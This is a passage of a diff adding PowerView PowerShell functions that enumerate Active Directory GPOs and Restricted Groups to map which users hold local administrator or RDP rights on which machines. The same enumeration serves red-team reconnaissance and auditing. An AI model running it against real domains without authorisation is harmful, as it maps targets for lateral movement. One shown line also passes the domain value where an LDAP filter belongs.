filters...I hate you GPP + if ($_.filters) { + $Filters = $_.filters.GetEnumerator() | ForEach-Object { + New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name} + } + } + else { + $Filters = $Null + } + + if ($Members -isnot [System.Array]) { $Members = @($Members) } + + $GroupsXML = New-Object PSObject + $GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath + $GroupsXML | Add-Member Noteproperty 'Filters' $Filters + $GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName + $GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID + $GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null + $GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members + $GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML') + $GroupsXML + } + } + } + catch { + Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_" + } + } + + END { + # remove the SYSVOL mappings + $MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ } + } +} + + +function Get-DomainGPO { +<# +.SYNOPSIS + +Return all GPOs or specific GPO objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty + +.DESCRIPTION + +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. To only return specific properties, use +"-Properties samaccountname,usnchanged,...". By default, all GPO objects for +the current domain are returned. To enumerate all GPOs that are applied to +a particular machine, use -ComputerName X. + +.PARAMETER Identity + +A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'), +GUID (e.g. 
'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
+
+.PARAMETER ComputerIdentity
+
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
+
+.PARAMETER UserIdentity
+
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
+
+Specifies the properties of the output object to retrieve from the server.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER SecurityMasks
+
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER FindOne
+
+Only return one result object.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.PARAMETER Raw
+
+Switch. Return raw results instead of translating the fields into a custom PSObject. 
+
+.EXAMPLE
+
+Get-DomainGPO -Domain testlab.local
+
+Return all GPOs for the testlab.local domain
+
+.EXAMPLE
+
+Get-DomainGPO -ComputerName windows1.testlab.local
+
+Returns all GPOs applied windows1.testlab.local
+
+.EXAMPLE
+
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
+
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
+
+.EXAMPLE
+
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
+
+.OUTPUTS
+
+PowerView.GPO
+
+Custom PSObject with translated GPO property fields.
+
+PowerView.GPO.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.GPO')]
+ [OutputType('PowerView.GPO.Raw')]
+ [CmdletBinding(DefaultParameterSetName = 'None')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
+
+ [Parameter(ParameterSetName = 'ComputerIdentity')]
+ [Alias('ComputerName')]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $ComputerIdentity,
+
+ [Parameter(ParameterSetName = 'UserIdentity')]
+ [Alias('UserName')]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $UserIdentity,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ 
[String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
+ )
+
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $GPOSearcher = Get-DomainSearcher @SearcherArguments
+ }
+
+ PROCESS {
+ if ($GPOSearcher) {
+ if ($PSBoundParameters['ComputerIdentity'] -or $PSBoundParameters['UserIdentity']) {
+ $GPOAdsPaths = @()
+ if ($SearcherArguments['Properties']) {
+ $OldProperties = $SearcherArguments['Properties']
+ }
+ $SearcherArguments['Properties'] = 'distinguishedname,dnshostname'
+ $TargetComputerName = $Null
+
+ if ($PSBoundParameters['ComputerIdentity']) {
+ 
$SearcherArguments['Identity'] = $ComputerIdentity
+ $Computer = Get-DomainComputer @SearcherArguments -FindOne | Select-Object -First 1
+ if(-not $Computer) {
+ Write-Verbose "[Get-DomainGPO] Computer '$ComputerIdentity' not found!"
+ }
+ $ObjectDN = $Computer.distinguishedname
+ $TargetComputerName = $Computer.dnshostname
+ }
+ else {
+ $SearcherArguments['Identity'] = $UserIdentity
+ $User = Get-DomainUser @SearcherArguments -FindOne | Select-Object -First 1
+ if(-not $User) {
+ Write-Verbose "[Get-DomainGPO] User '$UserIdentity' not found!"
+ }
+ $ObjectDN = $User.distinguishedname
+ }
+
+ # extract all OUs the target user/computer is a part of
+ $ObjectOUs = @()
+ $ObjectOUs += $ObjectDN.split(',') | ForEach-Object {
+ if($_.startswith('OU=')) {
+ $ObjectDN.SubString($ObjectDN.IndexOf("$($_),"))
+ }
+ }
+ Write-Verbose "[Get-DomainGPO] object OUs: $ObjectOUs"
+
+ if ($ObjectOUs) {
+ # find all the GPOs linked to the user/computer's OUs
+ $SearcherArguments.Remove('Properties')
+ $InheritanceDisabled = $False
+ ForEach($ObjectOU in $ObjectOUs) {
+ $SearcherArguments['Identity'] = $ObjectOU
+ $GPOAdsPaths += Get-DomainOU @SearcherArguments | ForEach-Object {
+ # extract any GPO links for this particular OU the computer is a part of
+ if ($_.gplink) {
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $Parts = $_.split(';')
+ $GpoDN = $Parts[0]
+ $Enforced = $Parts[1]
+
+ if ($InheritanceDisabled) {
+ # if inheritance has already been disabled and this GPO is set as "enforced"
+ # then add it, otherwise ignore it
+ if ($Enforced -eq 2) {
+ $GpoDN
+ }
+ }
+ else {
+ # inheritance not marked as disabled yet
+ $GpoDN
+ }
+ }
+ }
+ }
+
+ # if this OU has GPO inheritence disabled, break so additional OUs aren't processed
+ if ($_.gpoptions -eq 1) {
+ $InheritanceDisabled = $True
+ }
+ }
+ }
+ }
+
+ if ($TargetComputerName) {
+ # find all the GPOs linked to the computer's site
+ $ComputerSite = (Get-NetComputerSiteName -ComputerName 
$TargetComputerName).SiteName
+ if($ComputerSite -and ($ComputerSite -notlike 'Error*')) {
+ $SearcherArguments['Identity'] = $ComputerSite
+ $GPOAdsPaths += Get-DomainSite @SearcherArguments | ForEach-Object {
+ if($_.gplink) {
+ # extract any GPO links for this particular site the computer is a part of
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $_.split(';')[0]
+ }
+ }
+ }
+ }
+ }
+ }
+
+ # find any GPOs linked to the user/computer's domain
+ $ObjectDomainDN = $ObjectDN.SubString($ObjectDN.IndexOf('DC='))
+ $SearcherArguments.Remove('Identity')
+ $SearcherArguments.Remove('Properties')
+ $SearcherArguments['LDAPFilter'] = "(objectclass=domain)(distinguishedname=$ObjectDomainDN)"
+ $GPOAdsPaths += Get-DomainObject @SearcherArguments | ForEach-Object {
+ if($_.gplink) {
+ # extract any GPO links for this particular domain the computer is a part of
+ $_.gplink.split('][') | ForEach-Object {
+ if ($_.startswith('LDAP')) {
+ $_.split(';')[0]
+ }
+ }
+ }
+ }
+ Write-Verbose "[Get-DomainGPO] GPOAdsPaths: $GPOAdsPaths"
+
+ # restore the old properites to return, if set
+ if ($OldProperties) { $SearcherArguments['Properties'] = $OldProperties }
+ else { $SearcherArguments.Remove('Properties') }
+ $SearcherArguments.Remove('Identity')
+
+ $GPOAdsPaths | Where-Object {$_ -and ($_ -ne '')} | ForEach-Object {
+ # use the gplink as an ADS path to enumerate all GPOs for the computer
+ $SearcherArguments['SearchBase'] = $_
+ $SearcherArguments['LDAPFilter'] = "(objectCategory=groupPolicyContainer)"
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+ }
+ else {
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+ }
+ $_
+ }
+ }
+ }
+ else {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match 'LDAP://|^CN=.*') {
+ 
$IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainGPO] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $GPOSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $GPOSearcher) {
+ Write-Warning "[Get-DomainGPO] Unable to retrieve domain searcher for '$IdentityDomain'"
+ }
+ }
+ }
+ elseif ($IdentityInstance -match '{.*}') {
+ $IdentityFilter += "(name=$IdentityInstance)"
+ }
+ else {
+ try {
+ $GuidByteString = (-Join (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1'
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ catch {
+ $IdentityFilter += "(displayname=$IdentityInstance)"
+ }
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
+
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainGPO] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+
+ $GPOSearcher.filter = "(&(objectCategory=groupPolicyContainer)$Filter)"
+ Write-Verbose "[Get-DomainGPO] filter string: $($GPOSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $GPOSearcher.FindOne() }
+ else { $Results = $GPOSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $GPO = $_
+ $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO.Raw')
+ }
+ else {
+ if ($PSBoundParameters['SearchBase'] -and ($SearchBase -Match '^GC://')) {
+ $GPO = Convert-LDAPProperty -Properties $_.Properties
+ try {
+ $GPODN = 
$GPO.distinguishedname
+ $GPODomain = $GPODN.SubString($GPODN.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ $gpcfilesyspath = "\\$GPODomain\SysVol\$GPODomain\Policies\$($GPO.cn)"
+ $GPO | Add-Member Noteproperty 'gpcfilesyspath' $gpcfilesyspath
+ }
+ catch {
+ Write-Verbose "[Get-DomainGPO] Error calculating gpcfilesyspath for: $($GPO.distinguishedname)"
+ }
+ }
+ else {
+ $GPO = Convert-LDAPProperty -Properties $_.Properties
+ }
+ $GPO.PSObject.TypeNames.Insert(0, 'PowerView.GPO')
+ }
+ $GPO
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainGPO] Error disposing of the Results object: $_"
+ }
+ }
+ $GPOSearcher.dispose()
+ }
+ }
+ }
+}
+
+
+function Get-DomainGPOLocalGroup {
+<#
+.SYNOPSIS
+
+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'
+or Group Policy preferences. Also return their user membership mappings, if they exist.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID
+
+.DESCRIPTION
+
+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed
+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or
+group membership is set through Group Policy Preferences groups.xml files. For any
+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'
+section data is processed if present. Any found Groups.xml files are parsed with
+Get-GroupsXML and those memberships are returned as well.
+
+.PARAMETER Identity
+
+A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
+
+.PARAMETER ResolveMembersToSIDs
+
+Switch. 
Indicates that any member names should be resolved to their domain SIDs.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER SearchBase
+
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainGPOLocalGroup
+
+Returns all local groups set by GPO along with their members and memberof.
+
+.EXAMPLE
+
+Get-DomainGPOLocalGroup -ResolveMembersToSIDs
+
+Returns all local groups set by GPO along with their members and memberof,
+and resolve any members to their domain SIDs.
+
+.EXAMPLE
+
+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup
+
+Return any GPO-set groups for the GPO with the given name/GUID.
+
+.EXAMPLE
+
+Get-DomainGPOLocalGroup 'Desktops'
+
+Return any GPO-set groups for the GPO with the given display name.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOLocalGroup -Credential $Cred
+
+.LINK
+
+https://morgansimonsenblog.azurewebsites.net/tag/groups/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GPOGroup')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String[]]
+ $Identity,
+
+ [Switch]
+ $ResolveMembersToSIDs,
+
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $Domain }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { 
$SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $ConvertArguments = @{}
+ if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+
+ $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainGPO @SearcherArguments | ForEach-Object {
+ $GPOdisplayName = $_.displayname
+ $GPOname = $_.name
+ $GPOPath = $_.gpcfilesyspath
+
+ $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" }
+ if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
+
+ # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists
+ $Inf = Get-GptTmpl @ParseArgs
+
+ if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
+ $Memberships = @{}
+
+ # parse the members/memberof fields for each entry
+ ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
+ $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()}
+ # extract out ALL members
+ $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
+
+ if ($PSBoundParameters['ResolveMembersToSIDs']) {
+ # if the resulting member is username and not a SID, attempt to resolve it
+ $GroupMembers = @()
+ ForEach ($Member in $MembershipValue) {
+ if ($Member -and ($Member.Trim() -ne '')) {
+ if ($Member -notmatch '^S-1-.*') {
+ $ConvertToArguments = @{'ObjectName' = $Member}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $MemberSID = ConvertTo-SID @ConvertToArguments
+
+ if ($MemberSID) {
+ $GroupMembers += $MemberSID
+ }
+ else {
+ $GroupMembers 
+= $Member
+ }
+ }
+ else {
+ $GroupMembers += $Member
+ }
+ }
+ }
+ $MembershipValue = $GroupMembers
+ }
+
+ if (-not $Memberships[$Group]) {
+ $Memberships[$Group] = @{}
+ }
+ if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
+ $Memberships[$Group].Add($Relation, $MembershipValue)
+ }
+
+ ForEach ($Membership in $Memberships.GetEnumerator()) {
+ if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
+ # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
+ $GroupSID = $Membership.Key.Trim('*')
+ if ($GroupSID -and ($GroupSID.Trim() -ne '')) {
+ $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments
+ }
+ else {
+ $GroupName = $False
+ }
+ }
+ else {
+ $GroupName = $Membership.Key
+
+ if ($GroupName -and ($GroupName.Trim() -ne '')) {
+ if ($Groupname -match 'Administrators') {
+ $GroupSID = 'S-1-5-32-544'
+ }
+ elseif ($Groupname -match 'Remote Desktop') {
+ $GroupSID = 'S-1-5-32-555'
+ }
+ elseif ($Groupname -match 'Guests') {
+ $GroupSID = 'S-1-5-32-546'
+ }
+ elseif ($GroupName.Trim() -ne '') {
+ $ConvertToArguments = @{'ObjectName' = $Groupname}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $GroupSID = ConvertTo-SID @ConvertToArguments
+ }
+ else {
+ $GroupSID = $Null
+ }
+ }
+ }
+
+ $GPOGroup = New-Object PSObject
+ $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+ $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
+ $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
+ $GPOGroup | Add-Member Noteproperty 'Filters' $Null
+ $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
+ $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
+ $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
+ $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
+ 
$GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+ $GPOGroup
+ }
+ }
+
+ # now try to the parse group policy preferences file (Groups.xml) if it exists
+ $ParseArgs = @{
+ 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
+ }
+
+ Get-GroupsXML @ParseArgs | ForEach-Object {
+ if ($PSBoundParameters['ResolveMembersToSIDs']) {
+ $GroupMembers = @()
+ ForEach ($Member in $_.GroupMembers) {
+ if ($Member -and ($Member.Trim() -ne '')) {
+ if ($Member -notmatch '^S-1-.*') {
+
+ # if the resulting member is username and not a SID, attempt to resolve it
+ $ConvertToArguments = @{'ObjectName' = $Groupname}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member
+
+ if ($MemberSID) {
+ $GroupMembers += $MemberSID
+ }
+ else {
+ $GroupMembers += $Member
+ }
+ }
+ else {
+ $GroupMembers += $Member
+ }
+ }
+ }
+ $_.GroupMembers = $GroupMembers
+ }
+
+ $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+ $_ | Add-Member Noteproperty 'GPOName' $GPOName
+ $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+ $_
+ }
+ }
+ }
+}
+
+
+function Get-DomainGPOUserLocalGroupMapping {
+<#
+.SYNOPSIS
+
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation. If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
+
+.DESCRIPTION
+
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+ 1. resolving the user/group to its proper SID
+ 2. 
enumerating all groups the user/group is a current part of
+ and extracting all target SIDs to build a target SID list
+ 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+ Get-DomainGPOLocalGroup
+ 4. matching the target SID list to the queried GPO SID list
+ to enumerate all GPO the user is effectively applied with
+ 5. enumerating all OUs and sites and applicable GPO GUIs are
+ applied to through gplink enumerating
+ 6. querying for all computers under the given OUs or sites
+
+If no user/group is specified, all user/group -> machine mappings discovered through
+GPO relationships are returned.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harm j0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
+
+.PARAMETER LocalGroup
+
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
+
+.PARAMETER Domain
+
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
+
+.PARAMETER Server
+
+Specifies an Active Directory server (domain controller) to bind to.
+
+.PARAMETER SearchScope
+
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain. 
+
+.EXAMPLE
+
+Get-DomainGPOUserLocalGroupMapping
+
+Find all user/group -> machine relationships where the user/group is a member
+of the local administrators group on target machines.
+
+.EXAMPLE
+
+Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local
+
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
+
+.OUTPUTS
+
+PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
+.LINK
+
+http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GPOUserLocalGroupMapping')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
+ [String]
+ $Identity,
+
+ [String]
+ [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+ $LocalGroup = 'Administrators',
+
